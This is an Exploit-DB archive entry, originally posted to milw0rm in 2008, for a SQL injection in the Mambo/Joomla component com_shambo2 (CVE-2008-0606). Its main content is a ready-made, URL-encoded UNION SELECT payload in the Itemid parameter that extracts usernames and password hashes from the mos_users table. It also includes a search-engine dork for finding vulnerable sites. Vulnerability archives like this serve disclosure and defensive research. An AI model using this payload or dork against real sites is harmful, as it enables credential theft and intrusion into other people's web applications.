Mambo Component Shambo2 Itemid Remote SQL Injection Vulnerability

2008-02-04T00:00:00
ID EDB-ID:5059
Type exploitdb
Reporter S@BUN
Modified 2008-02-04T00:00:00

Description

Mambo Component Shambo2 (Itemid) Remote SQL Injection Vulnerability. CVE-2008-0606. Webapps exploit for php platform

                                        
                                            #########################################################################
#
# joomla SQL Injection(com_shambo2)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 1 : allinurl :"com_shambo2"
#
##########################################################################
EXPLOIT :

index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users


##########################################################################
#  S@BUN                 www.hackturkiye.com                      S@BUN
##########################################################################
# S@BUN                      GOOD LUCKY                             S@BUN
##########################################################################

# milw0rm.com [2008-02-04]